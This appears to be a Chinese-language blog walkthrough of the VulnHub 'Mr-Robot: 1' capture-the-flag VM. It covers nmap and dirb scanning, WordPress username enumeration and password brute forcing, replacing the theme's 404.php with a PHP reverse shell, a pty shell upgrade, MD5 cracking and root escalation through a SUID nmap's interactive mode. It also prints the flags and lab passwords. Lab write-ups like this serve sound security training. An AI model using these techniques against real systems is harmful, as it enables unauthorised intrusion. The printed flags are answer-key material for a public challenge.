前言

靶機(jī)主題來自美劇《黑客軍團(tuán)》，這是一部傳達(dá)極客精神和黑客文化的上佳作品，不同于《硅谷》的搞笑風(fēng)格，這部劇的主角Eliot患有精神分裂，整部劇的情節(jié)都較為壓抑，有點(diǎn)類似于電影《搏擊俱樂部》中雙重人格的斗爭(zhēng)。
雖然有影視色彩的加成，但是劇中的黑客技術(shù)細(xì)節(jié)還是足夠真實(shí)的，起碼符合常規(guī)的入侵滲透思路，強(qiáng)烈推薦該劇。
本次靶機(jī)有三個(gè)flag，難度在初級(jí)到中級(jí)，非常適合新手訓(xùn)練學(xué)習(xí)，不需要逆向技術(shù)，目標(biāo)就是找到三個(gè)key，并且拿到主機(jī)root權(quán)限。

 
環(huán)境配置
靶機(jī)下載地址：https://www.vulnhub.com/entry/mr-robot-1,151/
我使用的是VMware，導(dǎo)入ova文件，NAT方式連接后靶機(jī)自動(dòng)獲取IP
本次實(shí)戰(zhàn)：
靶機(jī)IP：192.168.128.142
攻擊機(jī)IP：192.168.128.106
 
實(shí)戰(zhàn)演練
nmap開路，IP發(fā)現(xiàn)：

端口發(fā)現(xiàn)，服務(wù)版本探測(cè)：
nmap -sV -O 192.168.128.142

開啟了三個(gè)端口，發(fā)現(xiàn)web端口：80,443


查看源碼沒有發(fā)現(xiàn)可用信息，用dirb跑目錄：


發(fā)現(xiàn)有robots.txt文件，訪問http://192.168.128.142/robots.txt

發(fā)現(xiàn)兩個(gè)文件，訪問發(fā)現(xiàn)第一個(gè)目錄里是一個(gè)密碼字典，第二個(gè)像是一個(gè)密碼哈希，這是第一個(gè)key
073403c8a58a1f80d943455fb30724b9



密碼哈希無法爆破，字典也先放著后面用，現(xiàn)在用nikto掃描，看看有沒有可用漏洞：

發(fā)現(xiàn)有wordpress服務(wù)，之前dirb掃目錄也發(fā)現(xiàn)了wordpress登錄頁面
http://192.168.128.142/wp-login

發(fā)現(xiàn)wordpress服務(wù)，用wpscan掃描網(wǎng)站，只有登錄頁面，并沒有發(fā)現(xiàn)什么可用漏洞

在登錄頁面隨便輸入之前字典中的用戶，發(fā)現(xiàn)可以枚舉用戶名：

用burp枚舉出了兩個(gè)用戶名：

用elloit作為用戶名，再掛上這個(gè)字典跑密碼：

跑了好久，終于跑出密碼：ER28-0652，字典實(shí)在太大了，對(duì)字典做了篩選為了截圖方便就把重新跑了一遍

接下來就是獲取權(quán)限了，登陸之后，依次點(diǎn)擊apperance>editor>404.php

在kali找到php-reverse-shell.php，將其覆蓋到404.php更改監(jiān)聽端口，IP

攻擊機(jī)上監(jiān)聽此端口，訪問http://192.168.128.142/234543658，任意不存在頁面觸發(fā)shell

執(zhí)行 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 獲得一個(gè)更加穩(wěn)定的shell

接下來查看靶機(jī)密碼文件：

發(fā)現(xiàn)沒法利用，先放一放。再看看其他目錄，找到一個(gè)密碼的md5散列.

拿出來破解:https://hashkiller.co.uk/md5-decrypter.aspx
abcdefghijklmnopqrstuvwxyz

用得到的密碼登錄robot

拿到第二個(gè)key，并且又拿到一個(gè)加密哈希，估計(jì)這個(gè)是root用戶的密碼
提升權(quán)限，但是沒有成功，只能想別的辦法
最后找到一個(gè)辦法，用nmap執(zhí)行root權(quán)限

nmap產(chǎn)生了一個(gè)root權(quán)限的新shell


代碼如下：
daemon@linux:/$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:/$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:/$ pwd
pwd
/
robot@linux:/$ cd /home
cd /home
robot@linux:/home$ ls
ls
robot
robot@linux:/home$ cd robot
cd robot
robot@linux:~$ ls
ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
robot@linux:~$ find / -user root -perm -4000 2>/dev/null
find / -user root -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:~$ /usr/local/bin/nmap —version
/usr/local/bin/nmap —version
nmap version 3.81 ( http://www.insecure.org/nmap/ )
robot@linux:~$ nmap —interactive
nmap —interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode — press h  for help
nmap> !whoami
!whoami
root
waiting to reap child : No child processes
nmap> !bash -p
!bash -p
bash-4.3# whoami
whoami
root
bash-4.3# cd /root
cd /root
bash-4.3# ls -al
ls -al
total 32
drwx——— 3 root root 4096 Nov 13 2015 .
drwxr-xr-x 22 root root 4096 Sep 16 2015 ..
-rw———- 1 root root 4058 Nov 14 2015 .bash_history
-rw-r—r— 1 root root 3274 Sep 16 2015 .bashrc
drwx——— 2 root root 4096 Nov 13 2015 .cache
-rw-r—r— 1 root root 0 Nov 13 2015 firstboot_done
-r———— 1 root root 33 Nov 13 2015 key-3-of-3.txt
-rw-r—r— 1 root root 140 Feb 20 2014 .profile
-rw———- 1 root root 1024 Sep 16 2015 .rnd
bash-4.3# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
bash-4.3# ls
ls
firstboot_done key-3-of-3.txt
成功拿到第三個(gè)key：
04787ddef27c3dee1ee161b21670b4e4
拿到靶機(jī)root權(quán)限，game over。
 
總結(jié)
這個(gè)靶機(jī)的難度并不大，遇到的難點(diǎn)：
1.使用 python -c ‘import pty; pty.spawn(“/bin/bash”)’ 可以獲得一個(gè)穩(wěn)定的shell，這個(gè)在實(shí)際滲透中用處也很大
2.用了很多辦法，一直拿不到root權(quán)限，查了很多資料發(fā)現(xiàn)了nmap自帶的提權(quán)腳本，這個(gè)技能get
3.這個(gè)靶機(jī)只開了web端口，ssh應(yīng)該也是可以觸發(fā)的，大牛們可以嘗試
4.思路就是通過web頁面漏洞拿下了整個(gè)主機(jī)，wp提權(quán)思路也很多，大家也可以換思路滲透